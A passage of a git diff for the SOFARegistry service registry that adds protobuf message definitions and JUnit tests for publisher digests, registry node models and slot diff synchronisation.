repeated string serviceIds = 1; +} + +message ServiceAppMappingResponse{ + map serviceAppMapping = 1; + int32 statusCode = 2; + string message = 3; +} + +message GetRevisionsRequest{ + repeated string revisions = 1; +} + +message GetRevisionsResponse{ + map revisions = 1; + int32 statusCode = 2; + string message = 3; +} + +message MetaHeartbeatRequest{ + repeated string revisions = 1; +} + +message MetaHeartbeatResponse{ + int32 statusCode = 1; + string message = 2; +} \ No newline at end of file diff --git a/server/common/model/src/main/resources/proto/BaseRegisterPb.proto b/server/common/model/src/main/resources/proto/BaseRegisterPb.proto new file mode 100644 index 000000000..5e21ae2c8 --- /dev/null +++ b/server/common/model/src/main/resources/proto/BaseRegisterPb.proto @@ -0,0 +1,23 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +message BaseRegisterPb { + string instanceId = 1; + string zone = 2; + string appName = 3; + string dataId = 4; + string group = 5; + string processId = 6; + string registId = 7; + string clientId = 8; + string dataInfoId = 9; + string ip = 10; + int32 port = 11; + string eventType = 12; + int64 version = 13; + int64 timestamp = 14; + map attributes = 15; +} + diff --git a/server/common/model/src/main/resources/proto/DataBoxPb.proto b/server/common/model/src/main/resources/proto/DataBoxPb.proto new file mode 100644 index 000000000..15f763025 --- /dev/null +++ b/server/common/model/src/main/resources/proto/DataBoxPb.proto @@ -0,0 +1,9 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +message DataBoxPb { + string data = 1; +} + diff --git a/server/common/model/src/main/resources/proto/DataBoxesPb.proto b/server/common/model/src/main/resources/proto/DataBoxesPb.proto new file mode 100644 index 000000000..bb09c9dd3 --- /dev/null +++ b/server/common/model/src/main/resources/proto/DataBoxesPb.proto @@ -0,0 +1,11 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +import "DataBoxPb.proto"; + +message DataBoxesPb { + repeated DataBoxPb data = 1; +} + diff --git a/server/common/model/src/main/resources/proto/EventTypePb.proto b/server/common/model/src/main/resources/proto/EventTypePb.proto new file mode 100644 index 000000000..c88dff1bf --- /dev/null +++ b/server/common/model/src/main/resources/proto/EventTypePb.proto @@ -0,0 +1,10 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +enum EventTypePb { + REGISTER = 0; + UNREGISTER = 1; +} + diff --git a/server/common/model/src/main/resources/proto/PublisherRegisterPb.proto b/server/common/model/src/main/resources/proto/PublisherRegisterPb.proto new file mode 100644 index 000000000..d3f915a0f --- /dev/null +++ b/server/common/model/src/main/resources/proto/PublisherRegisterPb.proto @@ -0,0 +1,14 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +import "DataBoxPb.proto"; +import "BaseRegisterPb.proto"; + +message PublisherRegisterPb { + repeated DataBoxPb dataList = 1; + + BaseRegisterPb baseRegister = 2; +} + diff --git a/server/common/model/src/main/resources/proto/ReceivedConfigDataPb.proto b/server/common/model/src/main/resources/proto/ReceivedConfigDataPb.proto new file mode 100644 index 000000000..80e1e3b57 --- /dev/null +++ b/server/common/model/src/main/resources/proto/ReceivedConfigDataPb.proto @@ -0,0 +1,16 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +import "DataBoxPb.proto"; + +message ReceivedConfigDataPb { + string dataId = 1; + string group = 2; + string instanceId = 3; + repeated string configuratorRegistIds = 4; + DataBoxPb dataBox = 5; + int64 version = 6; +} + diff --git a/server/common/model/src/main/resources/proto/ReceivedDataPb.proto b/server/common/model/src/main/resources/proto/ReceivedDataPb.proto new file mode 100644 index 000000000..11bad57ae --- /dev/null +++ b/server/common/model/src/main/resources/proto/ReceivedDataPb.proto @@ -0,0 +1,19 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +import "DataBoxesPb.proto"; + +message ReceivedDataPb { + string dataId = 1; + string group = 2; + string instanceId = 3; + string segment = 4; + string scope = 5; + repeated string subscriberRegistIds = 6; + map data = 7; + int64 version = 8; + string localZone = 9; +} + diff --git a/server/common/model/src/main/resources/proto/RegisterResponsePb.proto b/server/common/model/src/main/resources/proto/RegisterResponsePb.proto new file mode 100644 index 000000000..3053ebf8d --- /dev/null +++ b/server/common/model/src/main/resources/proto/RegisterResponsePb.proto @@ -0,0 +1,13 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +message RegisterResponsePb { + bool success = 1; + string registId = 2; + int64 version = 3; + bool refused = 4; + string message = 5; +} + diff --git a/server/common/model/src/main/resources/proto/ResultPb.proto b/server/common/model/src/main/resources/proto/ResultPb.proto new file mode 100644 index 000000000..e8211bfe5 --- /dev/null +++ b/server/common/model/src/main/resources/proto/ResultPb.proto @@ -0,0 +1,10 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +message ResultPb { + bool success = 1; + string message = 2; +} + diff --git a/server/common/model/src/main/resources/proto/ScopeEnumPb.proto b/server/common/model/src/main/resources/proto/ScopeEnumPb.proto new file mode 100644 index 000000000..8b89d7874 --- /dev/null +++ b/server/common/model/src/main/resources/proto/ScopeEnumPb.proto @@ -0,0 +1,11 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +enum ScopeEnumPb { + zone = 0; + dataCenter = 1; + global = 2; +} + diff --git a/server/common/model/src/main/resources/proto/SubscriberRegisterPb.proto b/server/common/model/src/main/resources/proto/SubscriberRegisterPb.proto new file mode 100644 index 000000000..f541683f3 --- /dev/null +++ b/server/common/model/src/main/resources/proto/SubscriberRegisterPb.proto @@ -0,0 +1,12 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +import "BaseRegisterPb.proto"; + +message SubscriberRegisterPb { + string scope = 1; + BaseRegisterPb baseRegister = 2; +} + diff --git a/server/common/model/src/main/resources/proto/SyncConfigRequestPb.proto b/server/common/model/src/main/resources/proto/SyncConfigRequestPb.proto new file mode 100644 index 000000000..4fd1b4c40 --- /dev/null +++ b/server/common/model/src/main/resources/proto/SyncConfigRequestPb.proto @@ -0,0 +1,10 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +message SyncConfigRequestPb { + string dataCenter = 1; + string zone = 2; +} + diff --git a/server/common/model/src/main/resources/proto/SyncConfigResponsePb.proto b/server/common/model/src/main/resources/proto/SyncConfigResponsePb.proto new file mode 100644 index 000000000..08a6cabe6 --- /dev/null +++ b/server/common/model/src/main/resources/proto/SyncConfigResponsePb.proto @@ -0,0 +1,13 @@ +syntax = "proto3"; +option java_package = "com.alipay.sofa.registry.common.model.client.pb"; +option java_multiple_files = true; +option go_package = "pb"; + +import "ResultPb.proto"; + +message SyncConfigResponsePb { + ResultPb result = 1; + repeated string availableSegments = 2; + int32 retryInterval = 3; +} + diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/PublisherDigestUtilTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/PublisherDigestUtilTest.java new file mode 100644 index 000000000..434b3e767 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/PublisherDigestUtilTest.java @@ -0,0 +1,134 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Maps; +import java.util.*; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherDigestUtilTest { + private static final Random RANDOM = new Random(); + // public static void main(String[] args) { + // // treemap is faster than list.sort + // perf(100000, 200); + // } + + @Test + public void testDigestConflict_sameId() { + for (int i = 1; i < 100; i++) { + int count = i * 10; + Map m1 = Maps.newHashMapWithExpectedSize(count); + Map m2 = Maps.newHashMapWithExpectedSize(count); + for (int j = 0; j < count; j++) { + String id = UUID.randomUUID().toString(); + long now = System.currentTimeMillis(); + long ver = 0; + int r = RANDOM.nextInt(9); + m1.put(id, RegisterVersion.of(ver, now)); + if (r % 3 == 0) { + m2.put(id, RegisterVersion.of(ver, now)); + } else if (r % 3 == 1) { + m2.put(id, RegisterVersion.of(ver + 1, now)); + } else { + m2.put(id, RegisterVersion.of(ver + 1, System.currentTimeMillis())); + } + } + DatumDigest d1 = PublisherDigestUtil.digest(new DatumSummary("testDataId", m1)); + DatumDigest d2 = PublisherDigestUtil.digest(new DatumSummary("testDataId", m2)); + Assert.assertFalse(StringFormatter.format("m1={},m2={}", m1, m2), d1.equals(d2)); + } + } + + @Test + public void testDigestConflict_diffId() { + for (int i = 1; i < 100; i++) { + int count = i * 10; + Map m1 = Maps.newHashMapWithExpectedSize(count); + Map m2 = Maps.newHashMapWithExpectedSize(count); + for (int j = 0; j < count; j++) { + String id = UUID.randomUUID().toString(); + long now = System.currentTimeMillis(); + long ver = 0; + int r = RANDOM.nextInt(9); + m1.put(id, RegisterVersion.of(ver, now)); + if (r % 3 == 0) { + m2.put(id, RegisterVersion.of(ver, now)); + } else if (r % 3 == 1) { + m2.put(id, RegisterVersion.of(ver + 1, now + 1)); + } else { + m2.put(UUID.randomUUID().toString(), RegisterVersion.of(ver, now)); + } + } + DatumDigest d1 = PublisherDigestUtil.digest(new DatumSummary("testDataId", m1)); + DatumDigest d2 = PublisherDigestUtil.digest(new DatumSummary("testDataId", m2)); + Assert.assertFalse(StringFormatter.format("m1={},m2={}", m1, m2), d1.equals(d2)); + } + } + + private static void perf(int count, int len) { + Map m = Maps.newHashMapWithExpectedSize(len); + + byte[] bs = new byte[100]; + for (int i = 0; i < len; i++) { + m.put(UUID.randomUUID().toString(), new Object()); + } + System.out.println("begin warmup"); + for (int i = 0; i < 100000; i++) { + perfTreeMap(m); + perfSortList(m); + } + System.out.println("finish warmup"); + long start = System.currentTimeMillis(); + for (int i = 0; i < count; i++) { + perfTreeMap(m); + } + System.out.println("@" + (System.currentTimeMillis() - start)); + + start = System.currentTimeMillis(); + for (int i = 0; i < count; i++) { + perfSortList(m); + } + System.out.println("@" + (System.currentTimeMillis() - start)); + } + + private static int perfTreeMap(Map m) { + TreeMap tree = new TreeMap<>(m); + int count = 0; + for (Map.Entry e : tree.entrySet()) { + count += e.getKey().length(); + } + return count; + } + + private static int perfSortList(Map m) { + String[] array = new String[m.size()]; + int i = 0; + for (String str : m.keySet()) { + array[i++] = str; + } + Arrays.sort(array); + int count = 0; + for (String str : array) { + count += str.length(); + } + return count; + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/SubscriberUtilsTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/SubscriberUtilsTest.java new file mode 100644 index 000000000..6ce071883 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/SubscriberUtilsTest.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model; + +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.google.common.collect.Lists; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; + +public class SubscriberUtilsTest { + @Test + public void testGetMaxRegisterTimestamp() { + Assert.assertEquals(0, SubscriberUtils.getMaxRegisterTimestamp(Collections.emptyList())); + Subscriber s1 = new Subscriber(); + s1.setRegisterTimestamp(System.currentTimeMillis()); + Assert.assertEquals( + s1.getRegisterTimestamp(), SubscriberUtils.getMaxRegisterTimestamp(Lists.newArrayList(s1))); + Subscriber s2 = new Subscriber(); + s2.setRegisterTimestamp(s1.getRegisterTimestamp() + 1); + + Assert.assertEquals( + s2.getRegisterTimestamp(), + SubscriberUtils.getMaxRegisterTimestamp(Lists.newArrayList(s1, s2))); + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/dataserver/DatumDigestTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/dataserver/DatumDigestTest.java new file mode 100644 index 000000000..06644ac3a --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/dataserver/DatumDigestTest.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.dataserver; + +import org.junit.Assert; +import org.junit.Test; + +public class DatumDigestTest { + @Test + public void test() { + DatumDigest datumDigest1 = new DatumDigest(1, 2, 3, 4, (short) 5, (short) 6); + DatumDigest datumDigest2 = new DatumDigest(1, 2, 3, 4, (short) 5, (short) 6); + Assert.assertEquals(datumDigest1, datumDigest2); + Assert.assertEquals(datumDigest1.hashCode(), datumDigest2.hashCode()); + Assert.assertEquals(datumDigest1.toString(), datumDigest2.toString()); + + DatumDigest datumDigest3 = new DatumDigest(2, 2, 3, 4, (short) 5, (short) 6); + Assert.assertNotEquals(datumDigest1, datumDigest3); + Assert.assertNotEquals(datumDigest1.toString(), datumDigest3.toString()); + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/blacklist/RegistryForbiddenServerRequestTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/blacklist/RegistryForbiddenServerRequestTest.java new file mode 100644 index 000000000..7bc834a95 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/blacklist/RegistryForbiddenServerRequestTest.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.blacklist; + +import com.alipay.sofa.registry.common.model.metaserver.DataOperation; +import org.junit.Assert; +import org.junit.Test; + +public class RegistryForbiddenServerRequestTest { + @Test + public void test() { + RegistryForbiddenServerRequest request = + new RegistryForbiddenServerRequest(DataOperation.ADD, "test"); + Assert.assertEquals(request.getOperation(), DataOperation.ADD); + Assert.assertEquals(request.getIp(), "test"); + Assert.assertTrue(request.toString(), request.toString().contains("test")); + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/nodes/NodeTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/nodes/NodeTest.java new file mode 100644 index 000000000..aac125cb8 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/nodes/NodeTest.java @@ -0,0 +1,89 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.nodes; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.store.URL; +import org.junit.Assert; +import org.junit.Test; + +public class NodeTest { + private String dc = "testDc"; + private String region = "testRegion"; + private URL url1 = new URL("192.168.1.1", 6666); + private URL url2 = new URL("192.168.1.2", 6666); + + @Test + public void testDataNode() { + DataNode dataNode1 = new DataNode(url1, dc); + DataNode dataNode2 = new DataNode(url2, dc); + DataNode dataNode3 = new DataNode(url1, dc); + Assert.assertEquals(dataNode1, dataNode3); + Assert.assertEquals(dataNode1.hashCode(), dataNode3.hashCode()); + Assert.assertEquals(dataNode1.toString(), dataNode3.toString()); + + Assert.assertNotEquals(dataNode1, dataNode2); + Assert.assertNotEquals(dataNode1.toString(), dataNode2.toString()); + + Assert.assertEquals(dataNode1.getNodeType(), Node.NodeType.DATA); + Assert.assertEquals(dataNode1.getDataCenter(), dc); + dataNode1.setRegistrationTimestamp(100); + Assert.assertEquals(100, dataNode1.getRegistrationTimestamp()); + Assert.assertNotEquals(dataNode1, dataNode3); + } + + @Test + public void testSessionNode() { + ProcessId processId1 = new ProcessId("test", 1, 2, 3); + ProcessId processId2 = new ProcessId("test1", 1, 2, 3); + SessionNode node1 = new SessionNode(url1, region, processId1); + SessionNode node2 = new SessionNode(url2, region, processId2); + SessionNode node3 = new SessionNode(url1, region, processId2); + Assert.assertEquals(node1, node3); + Assert.assertEquals(node1.hashCode(), node3.hashCode()); + Assert.assertEquals(node1.toString(), node3.toString()); + + Assert.assertNotEquals(node1, node2); + Assert.assertNotEquals(node1.toString(), node2.toString()); + + Assert.assertEquals(node1.getNodeType(), Node.NodeType.SESSION); + Assert.assertEquals(node1.getDataCenter(), null); + Assert.assertEquals(node1.getRegionId(), region); + + // processId not effect the equals + + Assert.assertEquals(node1.getProcessId(), processId1); + Assert.assertEquals(node1, node3); + } + + @Test + public void testMetaNode() { + MetaNode node1 = new MetaNode(url1, dc); + MetaNode node2 = new MetaNode(url2, dc); + MetaNode node3 = new MetaNode(url1, dc); + Assert.assertEquals(node1, node3); + Assert.assertEquals(node1.hashCode(), node3.hashCode()); + Assert.assertEquals(node1.toString(), node3.toString()); + + Assert.assertNotEquals(node1, node2); + Assert.assertNotEquals(node1.toString(), node2.toString()); + + Assert.assertEquals(node1.getNodeType(), Node.NodeType.META); + Assert.assertEquals(node1.getDataCenter(), dc); + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/rpc/DataCenterNodesTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/rpc/DataCenterNodesTest.java new file mode 100644 index 000000000..c341b2700 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/rpc/DataCenterNodesTest.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.rpc; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.store.URL; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; + +public class DataCenterNodesTest { + @Test + public void test() { + ProcessId processId1 = new ProcessId("test", 1, 2, 3); + final String dataId = "testDataId"; + DataCenterNodes request = new DataCenterNodes(Node.NodeType.CLIENT, 10, dataId); + SessionNode sessionNode = new SessionNode(new URL("192.168.1.1", 8888), "testZone", processId1); + request.setNodes(Collections.singletonMap("testKey", sessionNode)); + Assert.assertEquals(request.getDataCenterId(), dataId); + Assert.assertEquals(request.getVersion(), 10); + + Assert.assertEquals(request.getNodes().size(), 1); + Assert.assertEquals(request.getNodes().get("testKey"), sessionNode); + + Assert.assertTrue(request.toString(), request.toString().contains(dataId)); + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/rpc/NodeClusterViewRequestTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/rpc/NodeClusterViewRequestTest.java new file mode 100644 index 000000000..772b3ab26 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/metaserver/rpc/NodeClusterViewRequestTest.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.metaserver.rpc; + +import com.alipay.sofa.registry.common.model.Node; +import org.junit.Assert; +import org.junit.Test; + +public class NodeClusterViewRequestTest { + @Test + public void test() { + final String dc = "testDc"; + NodeClusterViewRequest request = new NodeClusterViewRequest(Node.NodeType.CLIENT, dc); + Assert.assertEquals(request.getNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(request.getDataCenterId(), dc); + Assert.assertTrue(request.toString(), request.toString().contains(dc)); + } +} diff --git a/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffSyncResultTest.java b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffSyncResultTest.java new file mode 100644 index 000000000..0ccf21c33 --- /dev/null +++ b/server/common/model/src/test/java/com/alipay/sofa/registry/common/model/slot/DataSlotDiffSyncResultTest.java @@ -0,0 +1,237 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.slot; + +import com.alipay.sofa.registry.common.model.PublisherDigestUtil; +import com.alipay.sofa.registry.common.model.PublisherUtils; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.Iterator; +import java.util.List; +import java.util.Map; +import java.util.concurrent.atomic.AtomicLong; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-24 16:44 yuzhi.lyz Exp $ + */ +public class DataSlotDiffSyncResultTest { + private static final Logger LOG = LoggerFactory.getLogger(DataSlotDiffSyncResultTest.class); + private static final AtomicLong SEQ = new AtomicLong(); + + @Test + public void testDiffDigestResult_emptyTarget() { + Map m = Maps.newHashMap(); + m.put("a", 100); + m.put("b", 200); + Map> publishers = randPublishers(m); + DataSlotDiffDigestResult result = + DataSlotDiffUtils.diffDigestResult(Collections.emptyMap(), publishers); + Assert.assertFalse(result.getAddedDataInfoIds().isEmpty()); + Assert.assertEquals(result.getAddedDataInfoIds(), Lists.newArrayList("a", "b")); + Assert.assertTrue(result.getRemovedDataInfoIds().isEmpty()); + } + + @Test + public void testDiffDigestResult_target() { + Map m = Maps.newHashMap(); + m.put("a", 100); + m.put("b", 200); + Map> publishers = randPublishers(m); + Map summaryMap = PublisherUtils.getDatumSummary(publishers); + Map digestMap = PublisherDigestUtil.digest(summaryMap); + DataSlotDiffDigestResult result = DataSlotDiffUtils.diffDigestResult(digestMap, publishers); + Assert.assertTrue(result.getAddedDataInfoIds().isEmpty()); + Assert.assertTrue(result.getRemovedDataInfoIds().isEmpty()); + + Map test = Maps.newHashMap(digestMap); + + test.put("c", new DatumDigest(1, 0, 0, 0, (short) 0, (short) 0)); + result = DataSlotDiffUtils.diffDigestResult(test, publishers); + Assert.assertTrue(result.getAddedDataInfoIds().isEmpty()); + Assert.assertFalse(result.getRemovedDataInfoIds().isEmpty()); + + Assert.assertEquals(result.getRemovedDataInfoIds(), Lists.newArrayList("c")); + + test = Maps.newHashMap(digestMap); + test.remove("b"); + test.put("c", new DatumDigest(1, 0, 0, 0, (short) 0, (short) 0)); + result = DataSlotDiffUtils.diffDigestResult(test, publishers); + // add "b" + Assert.assertEquals(result.getAddedDataInfoIds(), Lists.newArrayList("b")); + + // delete "c" + Assert.assertTrue(result.getRemovedDataInfoIds().size() == 1); + Assert.assertTrue(result.getRemovedDataInfoIds().contains("c")); + DataSlotDiffUtils.logDiffResult(result, 10); + } + + @Test + public void testDiffPublishersResult() { + Map m = Maps.newHashMap(); + m.put("a", 100); + m.put("b", 200); + + Map> publishers = randPublishers(m); + + // the same + Map summaryMap = PublisherUtils.getDatumSummary(publishers); + DataSlotDiffPublisherResult result = + DataSlotDiffUtils.diffPublishersResult(summaryMap.values(), publishers, 400); + Assert.assertFalse(result.isHasRemain()); + Assert.assertTrue(result.getUpdatedPublishers().isEmpty()); + Assert.assertTrue(result.getRemovedPublishers().isEmpty()); + + // now add c, d + Map newM = Maps.newHashMap(); + newM.put("c", 300); + newM.put("d", 400); + m.putAll(newM); + Map> addPublishers = randPublishers(newM); + publishers.putAll(addPublishers); + + // not reach max.publishers + summaryMap.put("c", new DatumSummary("c")); + summaryMap.put("d", new DatumSummary("d")); + result = DataSlotDiffUtils.diffPublishersResult(summaryMap.values(), publishers, 1000); + Assert.assertFalse(result.isHasRemain()); + Assert.assertTrue(result.getRemovedPublishers().isEmpty()); + + Assert.assertEquals(result.getUpdatedPublishers().keySet(), Sets.newHashSet("c", "d")); + checkUpdatedSize(m, result); + checkAddedPublisher(publishers, result); + + // reach max.publishers + result = DataSlotDiffUtils.diffPublishersResult(summaryMap.values(), publishers, 100); + Assert.assertTrue(result.isHasRemain()); + Assert.assertTrue(result.getRemovedPublishers().isEmpty()); + + Assert.assertEquals(result.getUpdatedPublishers().size(), 1); + Assert.assertTrue( + result.getUpdatedPublishers().keySet().contains("c") + || result.getUpdatedPublishers().keySet().contains("d")); + + checkUpdatedSize(m, result); + checkAddedPublisher(publishers, result); + + // delete a dataInfoId, delete b.publisher, modify c.publisher, add d.publisher + summaryMap = PublisherUtils.getDatumSummary(publishers); + publishers.remove("a"); + + Iterator> iter = publishers.get("b").entrySet().iterator(); + Publisher removedB = iter.next().getValue(); + iter.remove(); + + Publisher modifyC = null; + for (Map.Entry e : publishers.get("c").entrySet()) { + modifyC = e.getValue(); + modifyC.setRegisterTimestamp(System.nanoTime()); + break; + } + Publisher addD = randPublisher(); + publishers.get("d").put(addD.getRegisterId(), addD); + + // not reach max + result = DataSlotDiffUtils.diffPublishersResult(summaryMap.values(), publishers, 400); + Assert.assertFalse(result.isHasRemain()); + Assert.assertTrue(result.getRemovedPublishers().get("b").size() == 1); + Assert.assertEquals(result.getRemovedPublishers().get("b").get(0), removedB.getRegisterId()); + + Assert.assertEquals(result.getUpdatedPublishers().keySet(), Sets.newHashSet("c", "d")); + Assert.assertEquals(result.getUpdatedPublishers().get("c").size(), 1); + Assert.assertEquals(result.getUpdatedPublishers().get("d").size(), 1); + Assert.assertEquals(result.getUpdatedPublishers().get("c").get(0), modifyC); + 